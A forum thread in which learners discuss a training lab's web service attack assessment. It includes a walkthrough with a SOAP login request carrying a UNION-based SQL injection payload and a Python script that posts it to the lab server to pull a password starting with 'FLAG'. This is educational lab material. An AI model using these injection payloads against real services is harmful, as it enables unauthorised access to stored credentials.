Web Service & API Attacks - Skills Assessment

I used OpenAI and asked “If I use this sub-select “…(SELECT password FROM users WHERE username = ‘admin’ LIMIT 1);” How do I change it so that it only returns a row where the password begins with “FLAG” ?”

It provided me a subquery with a wildcard that helped me get the flag.

3hrs in and i still can’t find it, last exercise to finish the path, i crafted everything i could, automated, burp etc… i’m losing my mind if someone could help me please!

Holy moly I got it. I was completely lost most of this module. I feel like the author did a terrible job explaining things in this one. Most of the modules I do pretty well following along but this one was a nightmare.

Basically using the automate.py script they have in the earlier section and modifying it for Login requests rather than command executing and adding a very basic SQLi payload gave me the flag.

I did not care for this module at all and I hope they revist it and update it to be more clear in the instructions.

First of all, thank you for all the comments, they help me a lot to finish this module.

This is how i did it. First you need to craft a Login request. Remember, if the connection hangs, you are on the right track. [Using automate.py will save you time when sending payloads for the next task.

Next, you need to identify an SQLi vulnerability. Test your parameters [username:password]. Be simple. I highly recommend SQL Injection Fundamentals module. Also you can identify the dbms in use with simple SQLi this can help you to craft a sqlmap command.

Does anyone know how to get the flag through SQLi i had done it through shell

Guys, we need to help.

I have successfully access to the server, I can see the home directory, the list of all datafiles etc
/app/soap-wsdl

or the list of the username

...
lxd
usbmux
mysql
ubuntu

but a this moment I can’t find the corretct Payload to submit for SQLi.

Someone can help to build a simple payload?

http://x.x.x.x:3002/wsdl?wsdl=1 and 1=1

Just curious, i managed to solve using the SQL injection method.

How can we solve this using RCE?

I do this Walkthrough because in my opinion it is one of the worst modules ever made, it is very incomplete and full of missing information

  1. Identification of the problem and context

API in use is a web service soap. Soap requests are usually sent via XML. The user’s input, such as username and password, was moved on to a function that probably performed an SQL query to authenticate the user.

The initial idea was to take advantage of an SQli to manipulate the SQL query and get a password that starts with “flag”. This led us to study how to inject SQL to an input parameter, so that the SQL query on the server was performed in order to return the desired password.
2. Analysis of the soapput soap

The payload soap that interests us is the one that sends the username and password data. In a vulnerable application, we can inject SQL directly to these parameters.

The basic payload (without SQL injections) would have a format similar to this:

<soap:Body>
  <LoginRequest xmlns="http://tempuri.org/">
    <username>admin</username>
    <password>password</password>
  </LoginRequest>
</soap:Body>
  1. First attempt at SQL injection

Initially we tried to inject a simple SQli using a Union Select:

admin' UNION SELECT password, NULL FROM users WHERE password LIKE '(Enter the parameter)' --

The result of this injection was that the server returned the password (or passwords) that started with “flag”, just as required.

  1. Adaptation of the Python script

We built a Python script to automatically send our Soap request with the SQL injection. Python script allows:

Request an input of the user (in this case, the SQli to be performed).
Build the Payload Soap with SQL injection.
Send the request to the server via requests.post ().
View the answer containing the password (or information requested).

Here is the functioning of the final python script:

import requests

while True:
    cmd = input("$ ")

    payload = f'''<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
    <soap:Body>
    <LoginRequest xmlns="http://tempuri.org/">
    <username>admin' UNION SELECT password, NULL FROM users WHERE password LIKE 'Enter the parameter' -- </username>
    <password>password</password>
    </LoginRequest>
    </soap:Body>
    </soap:Envelope>'''

    response = requests.post(
        "http://ip:3002/wsdl", 
        data=payload,
        headers={"SOAPAction": '"Login"'}
    )

    print(response.content)